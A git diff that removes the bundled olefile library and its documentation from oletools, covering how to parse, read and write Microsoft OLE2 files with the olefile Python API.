-CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
-CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
diff --git a/oletools/thirdparty/olefile/__init__.py b/oletools/thirdparty/olefile/__init__.py
deleted file mode 100644
index 59b442df..00000000
--- a/oletools/thirdparty/olefile/__init__.py
+++ /dev/null
@@ -1,28 +0,0 @@
-#!/usr/local/bin/python
-# -*- coding: latin-1 -*-
-"""
-olefile (formerly OleFileIO_PL)
-
-Module to read/write Microsoft OLE2 files (also called Structured Storage or
-Microsoft Compound Document File Format), such as Microsoft Office 97-2003
-documents, Image Composer and FlashPix files, Outlook messages, ...
-This version is compatible with Python 2.6+ and 3.x
-
-Project website: http://www.decalage.info/olefile
-
-olefile is copyright (c) 2005-2015 Philippe Lagadec (http://www.decalage.info)
-
-olefile is based on the OleFileIO module from the PIL library v1.1.6
-See: http://www.pythonware.com/products/pil/index.htm
-
-The Python Imaging Library (PIL) is
- Copyright (c) 1997-2005 by Secret Labs AB
- Copyright (c) 1995-2005 by Fredrik Lundh
-
-See source code and LICENSE.txt for information on usage and redistribution.
-"""
-
-# first try to import olefile for Python 2.6+/3.x
-from .olefile import *
-# import metadata not covered by *:
-from .olefile import __version__, __author__, __date__
diff --git a/oletools/thirdparty/olefile/doc/API.html b/oletools/thirdparty/olefile/doc/API.html
deleted file mode 100644
index 633755eb..00000000
--- a/oletools/thirdparty/olefile/doc/API.html
+++ /dev/null
@@ -1,164 +0,0 @@
-How to use olefile - API
-This page is part of the documentation for olefile. It explains how to use all its features to parse and write OLE files. For more information about OLE files, see OLE_Overview.
-olefile can be used as an independent module or with PIL/Pillow. The main functions and methods are explained below.
-For more information, see also the file olefile.html, sample code at the end of the module itself, and docstrings within the code.
-Import olefile
-When the olefile package has been installed, it can be imported in Python applications with this statement:
-import olefile
-Before v0.40, olefile was named OleFileIO_PL. To maintain backward compatibility with older applications and samples, a simple script is also installed so that the following statement imports olefile as OleFileIO_PL:
-import OleFileIO_PL
-As of version 0.30, the code has been changed to be compatible with Python 3.x. As a consequence, compatibility with Python 2.5 or older is not provided anymore. However, a copy of OleFileIO_PL v0.26 (with some backported enhancements) is available as olefile2.py. When importing the olefile package, it falls back automatically to olefile2 if running on Python 2.5 or older. This is implemented in olefile/__init__.py. (new in v0.40)
-If you think olefile should stay compatible with Python 2.5 or older, please contact me.
-Test if a file is an OLE container
-Use isOleFile to check if the first bytes of the file contain the Magic for OLE files, before opening it. isOleFile returns True if it is an OLE file, False otherwise (new in v0.16).
-assert olefile.isOleFile('myfile.doc')
-The argument of isOleFile can be (new in v0.41):
-
-- the path of the file to open on disk (bytes or unicode string smaller than 1536 bytes),
-- or a bytes string containing the file in memory (bytes string longer than 1535 bytes),
-- or a file-like object (with read and seek methods).
-
-Open an OLE file from disk
-Create an OleFileIO object with the file path as parameter:
-ole = olefile.OleFileIO('myfile.doc')
-Open an OLE file from a bytes string
-This is useful if the file is already stored in memory as a bytes string.
-ole = olefile.OleFileIO(s)
-Note: olefile checks the size of the string provided as argument to determine if it is a file path or the content of an OLE file. An OLE file cannot be smaller than 1536 bytes. If the string is larger than 1535 bytes, then it is expected to contain an OLE file, otherwise it is expected to be a file path.
-(new in v0.41)
-Open an OLE file from a file-like object
-This is useful if the file is not on disk but only available as a file-like object (with read, seek and tell methods).
-ole = olefile.OleFileIO(f)
-If the file-like object does not have seek or tell methods, the easiest solution is to read the file entirely in a bytes string before parsing:
-data = f.read()
-ole = olefile.OleFileIO(data)
-How to handle malformed OLE files
-By default, the parser is configured to be as robust and permissive as possible, allowing it to parse most malformed OLE files. Only fatal errors will raise an exception. It is possible to tell the parser to be more strict in order to raise exceptions for files that do not fully conform to the OLE specifications, using the raise_defects option (new in v0.14):
-ole = olefile.OleFileIO('myfile.doc', raise_defects=olefile.DEFECT_INCORRECT)
-When the parsing is done, the list of non-fatal issues detected is available as a list in the parsing_issues attribute of the OleFileIO object (new in 0.25):
-print('Non-fatal issues raised during parsing:')
-if ole.parsing_issues:
-    for exctype, msg in ole.parsing_issues:
-        print('- %s: %s' % (exctype.__name__, msg))
-else:
-    print('None')
-Open an OLE file in write mode
-Before using the write features, the OLE file must be opened in read/write mode:
-ole = olefile.OleFileIO('test.doc', write_mode=True)
-(new in v0.40)
-The code for write features is new and it has not been thoroughly tested yet. See issue #6 for the roadmap and the implementation status. If you encounter any issue, please send me your feedback or report issues.
-Syntax for stream and storage paths
-Two different syntaxes are allowed for methods that need or return the path of streams and storages:
-
-Either a list of strings including all the storages from the root up to the stream/storage name. For example a stream called "WordDocument" at the root will have ['WordDocument'] as full path. A stream called "ThisDocument" located in the storage "Macros/VBA" will be ['Macros', 'VBA', 'ThisDocument']. This is the original syntax from PIL. While hard to read and not very convenient, this syntax works in all cases.
-Or a single string with slashes to separate storage and stream names (similar to the Unix path syntax). The previous examples would be 'WordDocument' and 'Macros/VBA/ThisDocument'. This syntax is easier, but may fail if a stream or storage name contains a slash (which is normally not allowed, according to the Microsoft specifications [MS-CFB]). (new in v0.15)
-
-Both are case-insensitive.
-Switching between the two is easy:
-slash_path = '/'.join(list_path)
-list_path = slash_path.split('/')
-Encoding:
-
-- Stream and Storage names are stored in Unicode format in OLE files, which means they may contain special characters (e.g. Greek, Cyrillic, Japanese, etc) that applications must support to avoid exceptions.
-- On Python 2.x, all stream and storage paths are handled by olefile in bytes strings, using the UTF-8 encoding by default. If you need to use Unicode instead, add the option path_encoding=None when creating the OleFileIO object. This is new in v0.42. Olefile was using the Latin-1 encoding until v0.41, therefore special characters were not supported.
-- On Python 3.x, all stream and storage paths are handled by olefile in unicode strings, without encoding.
-
-Get the list of streams
-listdir() returns a list of all the streams contained in the OLE file, including those stored in storages. Each stream is listed itself as a list, as described above.
-print(ole.listdir())
-Sample result:
-[['\x01CompObj'], ['\x05DocumentSummaryInformation'], ['\x05SummaryInformation']
-, ['1Table'], ['Macros', 'PROJECT'], ['Macros', 'PROJECTwm'], ['Macros', 'VBA',
-'Module1'], ['Macros', 'VBA', 'ThisDocument'], ['Macros', 'VBA', '_VBA_PROJECT']
-, ['Macros', 'VBA', 'dir'], ['ObjectPool'], ['WordDocument']]
-As an option it is possible to choose if storages should also be listed, with or without streams (new in v0.26):
-ole.listdir(streams=False, storages=True)
-Test if known streams/storages exist:
-exists(path) checks if a given stream or storage exists in the OLE file (new in v0.16). The provided path is case-insensitive.
-if ole.exists('worddocument'):
-    print("This is a Word document.")
-    if ole.exists('macros/vba'):
-        print("This document seems to contain VBA macros.")
-Read data from a stream
-openstream(path) opens a stream as a file-like object. The provided path is case-insensitive.
-The following example extracts the "Pictures" stream from a PPT file:
-pics = ole.openstream('Pictures')
-data = pics.read()
-Get information about a stream/storage
-Several methods can provide the size, type and timestamps of a given stream/storage:
-get_size(path) returns the size of a stream in bytes (new in v0.16):
-s = ole.get_size('WordDocument')
-get_type(path) returns the type of a stream/storage, as one of the following constants: STGTY_STREAM for a stream, STGTY_STORAGE for a storage, STGTY_ROOT for the root entry, and False for a non existing path (new in v0.15).
-t = ole.get_type('WordDocument')
-get_ctime(path) and get_mtime(path) return the creation and modification timestamps of a stream/storage, as a Python datetime object with UTC timezone. Please note that these timestamps are only present if the application that created the OLE file explicitly stored them, which is rarely the case. When not present, these methods return None (new in v0.26).
-c = ole.get_ctime('WordDocument')
-m = ole.get_mtime('WordDocument')
-The root storage is a special case: You can get its creation and modification timestamps using the OleFileIO.root attribute (new in v0.26):
-c = ole.root.getctime()
-m = ole.root.getmtime()
-Note: all these methods are case-insensitive.
-Overwriting a sector
-The write_sect method can overwrite any sector of the file. If the provided data is smaller than the sector size (normally 512 bytes, sometimes 4KB), data is padded with null characters. (new in v0.40)
-Here is an example:
-ole.write_sect(0x17, b'TEST')
-Note: following the MS-CFB specifications, sector 0 is actually the second sector of the file. You may use -1 as index to write the first sector.
-Overwriting a stream
-The write_stream method can overwrite an existing stream in the file. The new stream data must be the exact same size as the existing one. For now, write_stream can only write streams of 4KB or larger (stored in the main FAT).
-For example, you may change text in a MS Word document:
-ole = olefile.OleFileIO('test.doc', write_mode=True)
-data = ole.openstream('WordDocument').read()
-data = data.replace(b'foo', b'bar')
-ole.write_stream('WordDocument', data)
-ole.close()
-(new in v0.40)
-Extract metadata
-get_metadata() will check if standard property streams exist, parse all the properties they contain, and return an OleMetadata object with the found properties as attributes (new in v0.24).
-meta = ole.get_metadata()
-print('Author:', meta.author)
-print('Title:', meta.title)
-print('Creation date:', meta.create_time)
-# print all metadata:
-meta.dump()
-Available attributes include:
-codepage, title, subject, author, keywords, comments, template,
-last_saved_by, revision_number, total_edit_time, last_printed, create_time,
-last_saved_time, num_pages, num_words, num_chars, thumbnail,
-creating_application, security, codepage_doc, category, presentation_target,
-bytes, lines, paragraphs, slides, notes, hidden_slides, mm_clips,
-scale_crop, heading_pairs, titles_of_parts, manager, company, links_dirty,
-chars_with_spaces, unused, shared_doc, link_base, hlinks, hlinks_changed,
-version, dig_sig, content_type, content_status, language, doc_version
-See the source code of the OleMetadata class for more information.
-Parse a property stream
-get_properties(path) can be used to parse any property stream that is not handled by get_metadata. It returns a dictionary indexed by integers. Each integer is the index of the property, pointing to its value. For example in the standard property stream '\x05SummaryInformation', the document title is property #2, and the subject is #3.
-p = ole.getproperties('specialprops')
-By default, as in the original PIL version, timestamp properties are converted into a number of seconds since Jan 1, 1601. With the option convert_time, you can obtain more convenient Python datetime objects (UTC timezone). If some time properties should not be converted (such as total editing time in '\x05SummaryInformation'), the list of indexes can be passed as no_conversion (new in v0.25):
-p = ole.getproperties('specialprops', convert_time=True, no_conversion=[10])
-Close the OLE file
-Unless your application is a simple script that terminates after processing an OLE file, do not forget to close each OleFileIO object after parsing to close the file on disk. (new in v0.22)
-ole.close()
-Use olefile as a script for testing/debugging
-olefile can also be used as a script from the command-line to display the structure of an OLE file and its metadata, for example:
-olefile.py myfile.doc
-You can use the option -c to check that all streams can be read fully, and -d to generate very verbose debugging information.
-
-olefile documentation
-
-- Home
-- License
-- Install
-- Contribute, Suggest Improvements or Report Issues
-- OLE_Overview
-- API and Usage
-
-
-
diff --git a/oletools/thirdparty/olefile/doc/API.md b/oletools/thirdparty/olefile/doc/API.md
deleted file mode 100644
index e4a96679..00000000
--- a/oletools/thirdparty/olefile/doc/API.md
+++ /dev/null
@@ -1,313 +0,0 @@
-How to use olefile - API
-========================
-
-This page is part of the documentation for [olefile](https://bitbucket.org/decalage/olefileio_pl/wiki). It explains
-how to use all its features to parse and write OLE files. For more information about OLE files, see [[OLE_Overview]].
-
-olefile can be used as an independent module or with PIL/Pillow. The main functions and methods are explained below.
-
-For more information, see also the file **olefile.html**, sample code at the end of the module itself, and docstrings within the code.
-
-
-
-Import olefile
---------------
-
-When the olefile package has been installed, it can be imported in Python applications with this statement:
-
- :::python
- import olefile
-
-Before v0.40, olefile was named OleFileIO_PL. To maintain backward compatibility with older applications and samples, a
-simple script is also installed so that the following statement imports olefile as OleFileIO_PL:
-
- :::python
- import OleFileIO_PL
-
-As of version 0.30, the code has been changed to be compatible with Python 3.x. As a consequence, compatibility with
-Python 2.5 or older is not provided anymore. However, a copy of OleFileIO_PL v0.26 (with some backported enhancements)
-is available as olefile2.py. When importing the olefile package, it falls back automatically to olefile2 if running on
-Python 2.5 or older. This is implemented in olefile/__init__.py. (new in v0.40)
-
-If you think olefile should stay compatible with Python 2.5 or older, please [contact me](http://decalage.info/contact).
-
-
-## Test if a file is an OLE container
-
-Use **isOleFile** to check if the first bytes of the file contain the Magic for OLE files, before opening it. isOleFile
-returns True if it is an OLE file, False otherwise (new in v0.16).
-
- :::python
- assert olefile.isOleFile('myfile.doc')
-
-The argument of isOleFile can be (new in v0.41):
-
-- the path of the file to open on disk (bytes or unicode string smaller than 1536 bytes),
-- or a bytes string containing the file in memory (bytes string longer than 1535 bytes),
-- or a file-like object (with read and seek methods).
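As context for reviewers: the magic-byte test that isOleFile performs can be illustrated with a stdlib-only sketch. `looks_like_ole` is a hypothetical helper for illustration, not part of the olefile API; the 8-byte magic value is the well-known OLE2/CFB header signature from [MS-CFB].

```python
# OLE2/CFB files start with this well-known 8-byte magic signature,
# which is what isOleFile checks at the start of the file.
OLE_MAGIC = b'\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1'

def looks_like_ole(data: bytes) -> bool:
    """Return True if the byte string starts with the OLE2 magic."""
    return data[:8] == OLE_MAGIC

# A real OLE file cannot be smaller than 1536 bytes; pad for illustration.
fake_ole = OLE_MAGIC + b'\x00' * (1536 - 8)
print(looks_like_ole(fake_ole))       # True
print(looks_like_ole(b'PK\x03\x04'))  # False (ZIP/OOXML, not OLE2)
```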
-
-## Open an OLE file from disk
-
-Create an **OleFileIO** object with the file path as parameter:
-
- :::python
- ole = olefile.OleFileIO('myfile.doc')
-
-## Open an OLE file from a bytes string
-
-This is useful if the file is already stored in memory as a bytes string.
-
- :::python
- ole = olefile.OleFileIO(s)
-
-Note: olefile checks the size of the string provided as argument to determine if it is a file path or the content of an
-OLE file. An OLE file cannot be smaller than 1536 bytes. If the string is larger than 1535 bytes, then it is expected to
-contain an OLE file, otherwise it is expected to be a file path.
-
-(new in v0.41)
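The dispatch rule described above (file path vs. in-memory content, with 1536 bytes as the threshold) can be sketched as follows; `classify_ole_arg` is a hypothetical illustration of the documented heuristic, not olefile code:

```python
MIN_OLE_SIZE = 1536  # per the note above, an OLE file cannot be smaller than this

def classify_ole_arg(arg):
    """Mimic the documented heuristic: a bytes string of 1536 bytes or more
    is treated as OLE file content, anything shorter (or a str) as a path."""
    if isinstance(arg, bytes) and len(arg) >= MIN_OLE_SIZE:
        return 'content'
    return 'path'

print(classify_ole_arg('myfile.doc'))    # 'path'
print(classify_ole_arg(b'\x00' * 2048))  # 'content'
```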
-
-
-## Open an OLE file from a file-like object
-
-This is useful if the file is not on disk but only available as a file-like object (with read, seek and tell methods).
-
- :::python
- ole = olefile.OleFileIO(f)
-
-If the file-like object does not have seek or tell methods, the easiest solution is to read the file entirely in
-a bytes string before parsing:
-
- :::python
- data = f.read()
- ole = olefile.OleFileIO(data)
-
-
-## How to handle malformed OLE files
-
-By default, the parser is configured to be as robust and permissive as possible, allowing it to parse most malformed OLE files. Only fatal errors will raise an exception. It is possible to tell the parser to be more strict in order to raise exceptions for files that do not fully conform to the OLE specifications, using the raise_defects option (new in v0.14):
-
- :::python
- ole = olefile.OleFileIO('myfile.doc', raise_defects=olefile.DEFECT_INCORRECT)
-
-When the parsing is done, the list of non-fatal issues detected is available as a list in the parsing_issues attribute of the OleFileIO object (new in 0.25):
-
- :::python
- print('Non-fatal issues raised during parsing:')
- if ole.parsing_issues:
- for exctype, msg in ole.parsing_issues:
- print('- %s: %s' % (exctype.__name__, msg))
- else:
- print('None')
-
-
-## Open an OLE file in write mode
-
-Before using the write features, the OLE file must be opened in read/write mode:
-
- :::python
- ole = olefile.OleFileIO('test.doc', write_mode=True)
-
-(new in v0.40)
-
-The code for write features is new and it has not been thoroughly tested yet. See [issue #6](https://bitbucket.org/decalage/olefileio_pl/issue/6/improve-olefileio_pl-to-write-ole-files) for the roadmap and the implementation status. If you encounter any issue, please send me your [feedback](http://www.decalage.info/en/contact) or [report issues](https://bitbucket.org/decalage/olefileio_pl/issues?status=new&status=open).
-
-
-## Syntax for stream and storage paths
-
-Two different syntaxes are allowed for methods that need or return the path of streams and storages:
-
-1) Either a **list of strings** including all the storages from the root up to the stream/storage name. For example a
-stream called "WordDocument" at the root will have ['WordDocument'] as full path. A stream called "ThisDocument"
-located in the storage "Macros/VBA" will be ['Macros', 'VBA', 'ThisDocument']. This is the original syntax from PIL.
-While hard to read and not very convenient, this syntax works in all cases.
-
-2) Or a **single string with slashes** to separate storage and stream names (similar to the Unix path syntax).
-The previous examples would be 'WordDocument' and 'Macros/VBA/ThisDocument'. This syntax is easier, but may fail if a
-stream or storage name contains a slash (which is normally not allowed, according to the Microsoft specifications [MS-CFB]). (new in v0.15)
-
-Both are case-insensitive.
-
-Switching between the two is easy:
-
- :::python
- slash_path = '/'.join(list_path)
- list_path = slash_path.split('/')
-
-**Encoding**:
-
-- Stream and Storage names are stored in Unicode format in OLE files, which means they may contain special characters
- (e.g. Greek, Cyrillic, Japanese, etc) that applications must support to avoid exceptions.
-- **On Python 2.x**, all stream and storage paths are handled by olefile in bytes strings, using the **UTF-8 encoding**
- by default. If you need to use Unicode instead, add the option **path_encoding=None** when creating the OleFileIO
- object. This is new in v0.42. Olefile was using the Latin-1 encoding until v0.41, therefore special characters were
- not supported.
-- **On Python 3.x**, all stream and storage paths are handled by olefile in unicode strings, without encoding.
-
-## Get the list of streams
-
-listdir() returns a list of all the streams contained in the OLE file, including those stored in storages.
-Each stream is listed itself as a list, as described above.
-
- :::python
- print(ole.listdir())
-
-Sample result:
-
- :::python
- [['\x01CompObj'], ['\x05DocumentSummaryInformation'], ['\x05SummaryInformation']
- , ['1Table'], ['Macros', 'PROJECT'], ['Macros', 'PROJECTwm'], ['Macros', 'VBA',
- 'Module1'], ['Macros', 'VBA', 'ThisDocument'], ['Macros', 'VBA', '_VBA_PROJECT']
- , ['Macros', 'VBA', 'dir'], ['ObjectPool'], ['WordDocument']]
-
-As an option it is possible to choose if storages should also be listed, with or without streams (new in v0.26):
-
- :::python
- ole.listdir(streams=False, storages=True)
-
-
-## Test if known streams/storages exist:
-
-exists(path) checks if a given stream or storage exists in the OLE file (new in v0.16). The provided path is case-insensitive.
-
- :::python
- if ole.exists('worddocument'):
- print("This is a Word document.")
- if ole.exists('macros/vba'):
- print("This document seems to contain VBA macros.")
-
-
-## Read data from a stream
-
-openstream(path) opens a stream as a file-like object. The provided path is case-insensitive.
-
-The following example extracts the "Pictures" stream from a PPT file:
-
- :::python
- pics = ole.openstream('Pictures')
- data = pics.read()
-
-
-## Get information about a stream/storage
-
-Several methods can provide the size, type and timestamps of a given stream/storage:
-
-get_size(path) returns the size of a stream in bytes (new in v0.16):
-
- :::python
- s = ole.get_size('WordDocument')
-
-get_type(path) returns the type of a stream/storage, as one of the following constants: STGTY\_STREAM for a stream, STGTY\_STORAGE for a storage, STGTY\_ROOT for the root entry, and False for a non existing path (new in v0.15).
-
- :::python
- t = ole.get_type('WordDocument')
-
-get\_ctime(path) and get\_mtime(path) return the creation and modification timestamps of a stream/storage, as a Python datetime object with UTC timezone. Please note that these timestamps are only present if the application that created the OLE file explicitly stored them, which is rarely the case. When not present, these methods return None (new in v0.26).
-
- :::python
- c = ole.get_ctime('WordDocument')
- m = ole.get_mtime('WordDocument')
-
-The root storage is a special case: You can get its creation and modification timestamps using the OleFileIO.root attribute (new in v0.26):
-
- :::python
- c = ole.root.getctime()
- m = ole.root.getmtime()
-
-Note: all these methods are case-insensitive.
-
-## Overwriting a sector
-
-The write_sect method can overwrite any sector of the file. If the provided data is smaller than the sector size (normally 512 bytes, sometimes 4KB), data is padded with null characters. (new in v0.40)
-
-Here is an example:
-
- :::python
- ole.write_sect(0x17, b'TEST')
-
-Note: following the [MS-CFB specifications](http://msdn.microsoft.com/en-us/library/dd942138.aspx), sector 0 is actually the second sector of the file. You may use -1 as index to write the first sector.
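The note above implies a simple offset formula: sector index i starts at byte `sector_size * (i + 1)`, with index -1 mapping to the header at offset 0. `sector_offset` below is a hypothetical helper sketching that arithmetic, not an olefile function:

```python
def sector_offset(sect: int, sector_size: int = 512) -> int:
    """File offset of a sector index; per MS-CFB, sector 0 is the second
    sector of the file, and index -1 addresses the very first one (header)."""
    return sector_size * (sect + 1)

print(sector_offset(0))     # 512   (second sector of the file)
print(sector_offset(-1))    # 0     (first sector, i.e. the header)
print(sector_offset(0x17))  # 12288 (the sector written in the example above)
```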
-
-
-## Overwriting a stream
-
-The write_stream method can overwrite an existing stream in the file. The new stream data must be the exact same size as the existing one. For now, write_stream can only write streams of 4KB or larger (stored in the main FAT).
-
-For example, you may change text in a MS Word document:
-
- :::python
- ole = olefile.OleFileIO('test.doc', write_mode=True)
- data = ole.openstream('WordDocument').read()
- data = data.replace(b'foo', b'bar')
- ole.write_stream('WordDocument', data)
- ole.close()
-
-(new in v0.40)
-
-
-
-## Extract metadata
-
-get_metadata() will check if standard property streams exist, parse all the properties they contain, and return an OleMetadata object with the found properties as attributes (new in v0.24).
-
- :::python
- meta = ole.get_metadata()
- print('Author:', meta.author)
- print('Title:', meta.title)
- print('Creation date:', meta.create_time)
- # print all metadata:
- meta.dump()
-
-Available attributes include:
-
- :::text
- codepage, title, subject, author, keywords, comments, template,
- last_saved_by, revision_number, total_edit_time, last_printed, create_time,
- last_saved_time, num_pages, num_words, num_chars, thumbnail,
- creating_application, security, codepage_doc, category, presentation_target,
- bytes, lines, paragraphs, slides, notes, hidden_slides, mm_clips,
- scale_crop, heading_pairs, titles_of_parts, manager, company, links_dirty,
- chars_with_spaces, unused, shared_doc, link_base, hlinks, hlinks_changed,
- version, dig_sig, content_type, content_status, language, doc_version
-
-See the source code of the OleMetadata class for more information.
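If dump() is too verbose, the same attribute names can drive a small helper that keeps only the properties actually present in the file (attributes of OleMetadata are None when the property is absent). This is a sketch: `present_properties` is a hypothetical helper, and ATTRIBS is an abbreviated subset of the list above.

```python
# Abbreviated subset of the OleMetadata attribute names listed above
ATTRIBS = ['title', 'subject', 'author', 'keywords', 'comments',
           'create_time', 'last_saved_time', 'num_pages', 'company']

def present_properties(meta):
    # Attributes are None when the property is absent from the file,
    # so keep only those that carry a value.
    return {name: getattr(meta, name)
            for name in ATTRIBS
            if getattr(meta, name, None) is not None}
```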
-
-
-## Parse a property stream
-
-getproperties(path) can be used to parse any property stream that is not handled by get\_metadata. It returns a dictionary indexed by property ID (an integer), mapping each ID to the property value. For example, in the standard property stream '\x05SummaryInformation', the document title is property #2 and the subject is #3.
-
- :::python
- p = ole.getproperties('specialprops')
-
-By default, as in the original PIL version, timestamp properties are converted into a number of seconds since Jan 1, 1601. With the option convert\_time, you can obtain more convenient Python datetime objects (UTC timezone). If some time properties should not be converted (such as the total editing time in '\x05SummaryInformation'), their indexes can be passed as no_conversion (new in v0.25):
-
- :::python
- p = ole.getproperties('specialprops', convert_time=True, no_conversion=[10])
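The conversion performed by convert_time can also be reproduced by hand. The sketch below shows the underlying arithmetic, assuming the raw value really is a number of seconds since the 1601 epoch, as described above:

```python
from datetime import datetime, timedelta

def seconds_1601_to_datetime(seconds):
    # Without convert_time, timestamp properties are the number of
    # seconds elapsed since the FILETIME epoch: January 1, 1601 (UTC).
    return datetime(1601, 1, 1) + timedelta(seconds=seconds)

# The Unix epoch is 11644473600 seconds after the 1601 epoch:
assert seconds_1601_to_datetime(11644473600) == datetime(1970, 1, 1)
```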
-
-
-## Close the OLE file
-
-Unless your application is a simple script that terminates right after processing an OLE file, do not forget to close each OleFileIO object after use, so that the underlying file on disk is released. (new in v0.22)
-
- :::python
- ole.close()
-
-## Use olefile as a script for testing/debugging
-
-olefile can also be used as a script from the command-line to display the structure of an OLE file and its metadata, for example:
-
- :::text
- olefile.py myfile.doc
-
-You can use the option -c to check that all streams can be read fully, and -d to generate very verbose debugging information.
-
---------------------------------------------------------------------------
-
-olefile documentation
----------------------
-
-- [[Home]]
-- [[License]]
-- [[Install]]
-- [[Contribute]], Suggest Improvements or Report Issues
-- [[OLE_Overview]]
-- [[API]] and Usage
diff --git a/oletools/thirdparty/olefile/doc/Contribute.html b/oletools/thirdparty/olefile/doc/Contribute.html
deleted file mode 100644
index 2ae57ca8..00000000
--- a/oletools/thirdparty/olefile/doc/Contribute.html
+++ /dev/null
@@ -1,28 +0,0 @@
-
-
-
-
-
-
-
-
-
-How to Suggest Improvements, Report Issues or Contribute
-This is a personal open-source project, developed in my spare time. Any contribution, suggestion, feedback or bug report is welcome.
-To suggest improvements, report a bug or any issue, please use the issue reporting page, providing all the information and files to reproduce the problem.
-If possible, please attach the debugging output of olefile. To generate it, run the following command:
- olefile.py -d -c file >debug.txt
-You may also contact the author directly to provide feedback.
-The code is available in a Mercurial repository on Bitbucket. You may use it to submit enhancements using forks and pull requests.
-
-olefile documentation
-
-- Home
-- License
-- Install
-- Contribute, Suggest Improvements or Report Issues
-- OLE_Overview
-- API and Usage
-
-
-
diff --git a/oletools/thirdparty/olefile/doc/Contribute.md b/oletools/thirdparty/olefile/doc/Contribute.md
deleted file mode 100644
index 0de1e4b8..00000000
--- a/oletools/thirdparty/olefile/doc/Contribute.md
+++ /dev/null
@@ -1,28 +0,0 @@
-How to Suggest Improvements, Report Issues or Contribute
-========================================================
-
-This is a personal open-source project, developed in my spare time. Any contribution, suggestion, feedback or bug report is welcome.
-
-To **suggest improvements, report a bug or any issue**, please use the [issue reporting page](https://bitbucket.org/decalage/olefileio_pl/issues?status=new&status=open), providing all the information and files to reproduce the problem.
-
-If possible, please attach the debugging output of olefile. To generate it, run the following command:
-
- :::text
- olefile.py -d -c file >debug.txt
-
-
-You may also [contact the author](http://decalage.info/contact) directly to **provide feedback**.
-
-The code is available in [a Mercurial repository on Bitbucket](https://bitbucket.org/decalage/olefileio_pl). You may use it to **submit enhancements** using forks and pull requests.
-
---------------------------------------------------------------------------
-
-olefile documentation
----------------------
-
-- [[Home]]
-- [[License]]
-- [[Install]]
-- [[Contribute]], Suggest Improvements or Report Issues
-- [[OLE_Overview]]
-- [[API]] and Usage
diff --git a/oletools/thirdparty/olefile/doc/Home.html b/oletools/thirdparty/olefile/doc/Home.html
deleted file mode 100644
index 57e734d7..00000000
--- a/oletools/thirdparty/olefile/doc/Home.html
+++ /dev/null
@@ -1,62 +0,0 @@
-
-
-
-
-
-
-
-
-
-olefile v0.42 documentation
-This is the home page of the documentation for olefile. The latest version can be found online, otherwise a copy is provided in the doc subfolder of the package.
-olefile is a Python package to parse, read and write Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office 97-2003 documents, Image Composer and FlashPix files, Outlook messages, StickyNotes, several Microscopy file formats, McAfee antivirus quarantine files, etc.
-Quick links: Home page - Download/Install - Documentation - Report Issues/Suggestions/Questions - Contact the author - Repository - Updates on Twitter
-Documentation pages
-
-- License
-- Install
-- Contribute, Suggest Improvements or Report Issues
-- OLE_Overview
-- API and Usage
-
-Features
-
-- Parse, read and write any OLE file such as Microsoft Office 97-2003 legacy document formats (Word .doc, Excel .xls, PowerPoint .ppt, Visio .vsd, Project .mpp), Image Composer and FlashPix files, Outlook messages, StickyNotes, Zeiss AxioVision ZVI files, Olympus FluoView OIB files, etc
-- List all the streams and storages contained in an OLE file
-- Open streams as files
-- Parse and read property streams, containing metadata of the file
-- Portable, pure Python module, no dependency
-
-olefile can be used as an independent module or with PIL/Pillow.
-olefile is mostly meant for developers. If you are looking for tools to analyze OLE files or to extract data (especially for security purposes such as malware analysis and forensics), then please also check my python-oletools, which are built upon olefile and provide a higher-level interface.
-History
-olefile is based on the OleFileIO module from PIL, the excellent Python Imaging Library, created and maintained by Fredrik Lundh. The olefile API is still compatible with PIL, but since 2005 I have improved the internal implementation significantly, with new features, bugfixes and a more robust design. From 2005 to 2014 the project was called OleFileIO_PL, and in 2014 I changed its name to olefile to celebrate its 9 years and its new write features.
-As far as I know, this module is the most complete and robust Python implementation to read MS OLE2 files, portable on several operating systems. (please tell me if you know other similar Python modules)
-Since 2014 olefile/OleFileIO_PL has been integrated into Pillow, the friendly fork of PIL. olefile will continue to be improved as a separate project, and new versions will be merged into Pillow regularly.
-Main improvements over the original version of OleFileIO in PIL:
-
-- Compatible with Python 3.x and 2.6+
-- Many bug fixes
-- Support for files larger than 6.8MB
-- Support for 64 bits platforms and big-endian CPUs
-- Robust: many checks to detect malformed files
-- Runtime option to choose if malformed files should be parsed or raise exceptions
-- Improved API
-- Metadata extraction, stream/storage timestamps (e.g. for document forensics)
-- Can open file-like objects
-- Added setup.py and install.bat to ease installation
-- More convenient slash-based syntax for stream paths
-- Write features
-
-
-olefile documentation
-
-- Home
-- License
-- Install
-- Contribute, Suggest Improvements or Report Issues
-- OLE_Overview
-- API and Usage
-
-
-
diff --git a/oletools/thirdparty/olefile/doc/Home.md b/oletools/thirdparty/olefile/doc/Home.md
deleted file mode 100644
index 4f22e554..00000000
--- a/oletools/thirdparty/olefile/doc/Home.md
+++ /dev/null
@@ -1,94 +0,0 @@
-olefile v0.42 documentation
-===========================
-
-This is the home page of the documentation for olefile. The latest version can be found
-[online](https://bitbucket.org/decalage/olefileio_pl/wiki), otherwise a copy is provided in the doc subfolder of the package.
-
-[olefile](http://www.decalage.info/olefile) is a Python package to parse, read and write
-[Microsoft OLE2 files](http://en.wikipedia.org/wiki/Compound_File_Binary_Format)
-(also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft
-Office 97-2003 documents, Image Composer and FlashPix files, Outlook messages, StickyNotes, several Microscopy file
-formats, McAfee antivirus quarantine files, etc.
-
-
-**Quick links:**
-[Home page](http://www.decalage.info/olefile) -
-[Download/Install](https://bitbucket.org/decalage/olefileio_pl/wiki/Install) -
-[Documentation](https://bitbucket.org/decalage/olefileio_pl/wiki) -
-[Report Issues/Suggestions/Questions](https://bitbucket.org/decalage/olefileio_pl/issues?status=new&status=open) -
-[Contact the author](http://decalage.info/contact) -
-[Repository](https://bitbucket.org/decalage/olefileio_pl) -
-[Updates on Twitter](https://twitter.com/decalage2)
-
-Documentation pages
--------------------
-
-- [[License]]
-- [[Install]]
-- [[Contribute]], Suggest Improvements or Report Issues
-- [[OLE_Overview]]
-- [[API]] and Usage
-
-
-Features
---------
-
-- Parse, read and write any OLE file such as Microsoft Office 97-2003 legacy document formats (Word .doc, Excel .xls,
- PowerPoint .ppt, Visio .vsd, Project .mpp), Image Composer and FlashPix files, Outlook messages, StickyNotes, Zeiss
- AxioVision ZVI files, Olympus FluoView OIB files, etc
